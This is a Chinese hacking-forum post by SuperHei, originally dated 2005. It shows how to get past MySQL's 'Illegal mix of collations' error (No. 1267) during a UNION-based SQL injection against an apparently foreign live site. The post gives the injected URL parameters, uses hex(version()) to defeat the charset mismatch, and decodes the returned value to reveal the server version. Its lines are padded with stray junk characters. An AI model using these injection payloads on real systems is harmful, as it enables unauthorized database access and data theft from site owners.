找回密码
 立即注册
查看: 2245|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei
6 v# y  \. k, I1 E  {1 @' G5 Z$ R文章性质:原创
: `3 J2 v' m& _" N发布日期:2005-10-180 l7 O& Y# r* `. Q
测试个国外的站时:0 i" s, Y, m# z$ k# g, n+ E& s
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*  e" I  C! ~( W4 S4 _  b
返回错误:
/ L; ?7 Q+ z: q% ~# k4 hIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
5 Q  h, h& e; y  R2 uMySQL Error No. 126- T7 ]9 t- W9 V; R3 b) ]- x3 E, P& g
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
4 K2 T+ d7 H& K8 v# J( K解决办法:转为其他编码如hex。
1 a' i& T" y3 `% lurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
. b+ z2 w! M4 U! ^; a% N4 r( y1 [成功得到hex(version())的值为:( w$ c! `( C9 L( Q) w
342E312E332D62657461
, p) g: p7 F' N( A, u' K; H5 L回Mysql查询下得到:
& }2 {# p0 R! q- Y0 P- N2 B3 j" _mysql> select 0x342E312E332D62657461;
5 i+ m. D& v8 b  g/ \- D# w+------------------------+
" {' ^3 z8 q& ~3 F; s: {4 _| 0x342E312E332D62657461 |
+ j3 B( }' [( x: r+------------------------+$ Y. _6 Q; G1 C) N0 ~
| 4.1.3-beta |7 S2 h7 e" k6 }/ P
+------------------------+, _& p# W4 f! v: d, u. y
1 row in set (0.00 sec); a$ y" U4 g8 u/ v; I" K
3 z3 L% i; V/ d5 G4 U; d0 {" o1 U
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表